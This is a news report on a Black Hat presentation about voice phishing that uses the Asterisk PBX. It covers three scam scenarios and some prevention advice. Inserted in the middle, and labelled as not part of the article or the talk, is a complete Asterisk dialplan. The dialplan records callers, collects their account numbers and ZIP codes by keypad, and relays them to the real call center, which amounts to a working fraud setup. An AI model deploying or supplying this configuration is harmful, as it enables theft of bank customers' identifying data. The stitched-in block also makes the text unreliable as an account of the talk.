As the Black Hat conference descends upon Las Vegas this week, internetnews.com presents a series of articles addressing security issues past and present.
LAS VEGAS -- It wasn't that long ago that phishing was an e-mail-only issue. But that has recently changed with the introduction of terms such as vishing (voice phishing) into the security lexicon.
In a presentation here at the Black Hat conference, security researcher Jay Shulman explained how a voice phishing scam can be executed with the help of the Asterisk PBX.
The Asterisk VoIP PBX project is perhaps the best-known and most popular open source VoIP project in the world today. It is lowering the barrier to entry into telephony for millions, including hackers out to steal your money and personal information.
The economics of voice phishing have also changed, thanks to open source Asterisk.
“Five years ago you would have had to buy a commercial system; the fact that there is an open source one available just makes this a lot more accessible,” Shulman said.
Shulman was careful to qualify that his presentation was not intended to inspire others to follow his lesson plan.
“I'm trying to show the power of the tools, not trying to show you what to do,” Shulman said.
He did, however, describe, demonstrate and detail several attack vectors for executing voice-based phishing scams.
In one scenario, the victim is sent an e-mail and asked to call a 1-800 number, which the attacker sets up. At the receiving end is the Asterisk PBX, which answers the call and asks the caller identifying questions, such as account number and ZIP code. The PBX records and handles the call and then hangs up.
The second attack vector was a man-in-the-middle approach in which the victim calls into the attacker's 1-800 number. The attacker's PBX then transparently forwards the call to a real customer service phone number, while still staying on the line and recording all of the information. Shulman described that approach as very manual, and yet very difficult to detect, because the victim ends up speaking to the genuine call center.
The third attack is a combination of the first two approaches. The victim calls into the 1-800 number, the attacker's PBX asks for the personal information, and the call is then transferred to a real customer service operator.
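What the three scenarios look like as an Asterisk dialplan, as an added illustration that is not part of the article or of Shulman's talk material, and not code from the Asterisk project: everything here is stock Asterisk dialplan applications (Answer, MixMonitor, Read, Dial, Hangup), which is the point about the lowered barrier to entry. The context name, the trunk name "trunk" and the 555 number standing in for the real customer service line are assumptions.

```ini
; extensions.conf fragment (added illustration; context, trunk and numbers are assumed).
; Assumed: the attacker's toll-free number lands in context [inbound-tollfree],
; a SIP trunk named "trunk" exists, and 18005550100 stands in for the bank's real number.
; The three scenarios are written as three extensions only so they can be read side by side.

[inbound-tollfree]
; Scenario 1: automated harvest. Answer, prompt for identifiers, record, hang up.
exten => 1,1,Answer()
 same => n,MixMonitor(${UNIQUEID}-harvest.wav)        ; records the whole call to the monitor spool
 same => n,Read(ACCT,please-enter-account-number,16)  ; DTMF digits land in ${ACCT}
 same => n,Read(ZIP,please-enter-zip,5)               ; DTMF digits land in ${ZIP}
 same => n,NoOp(caller=${CALLERID(num)} acct=${ACCT} zip=${ZIP})  ; written to the Asterisk log
 same => n,Hangup()

; Scenario 2: transparent relay. Record, then bridge the caller to the real call center.
exten => 2,1,Answer()
 same => n,MixMonitor(${UNIQUEID}-relay.wav)
 same => n,Dial(SIP/18005550100@trunk)                ; caller talks to the genuine operator
 same => n,Hangup()

; Scenario 3: harvest first, then relay so the caller believes the call went normally.
exten => 3,1,Answer()
 same => n,MixMonitor(${UNIQUEID}-combo.wav)
 same => n,Read(ACCT,please-enter-account-number,16)
 same => n,Read(ZIP,please-enter-zip,5)
 same => n,NoOp(caller=${CALLERID(num)} acct=${ACCT} zip=${ZIP})
 same => n,Dial(SIP/18005550100@trunk)
 same => n,Hangup()
```

Two things stand out from the defender's side. First, nothing in the PBX side of scenarios 2 and 3 is exotic: the relay is an ordinary Dial() with recording switched on, so the real call center sees an inbound call like any other, and the caller hears the real operator. Second, the only fact that distinguishes a relayed call from a direct one is the number the victim actually dialed, which is exactly what the "ask which 1-800 number you dialed" check in Shulman's recommendations is designed to surface.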
To add insult to injury, Shulman suggested that the attacker could take the CallerID information from the victim and have the PBX call the victim back to confirm the call.
“It would encourage them that they've done something right, when in fact they've done something quite wrong,” Shulman said.
Though most of Shulman's talk was about exploitation paths using Asterisk, he ended with a few suggestions on how to prevent voice-based phishing attacks.
One suggestion was that people should only ever call the 1-800 number printed on the back of their bank or credit card, never one supplied in an e-mail.
Financial institutions should also step up and warn and educate users about the risks of voice phishing.
Shulman also suggested that call center representatives should ask callers which 1-800 number they dialed, to further ensure that the call is not being relayed through a phishing exploit.
“The only reason why this works is because social engineering works,” Shulman said. “This is all still relatively new, but we need to do something to point out to people that they've called the wrong number.”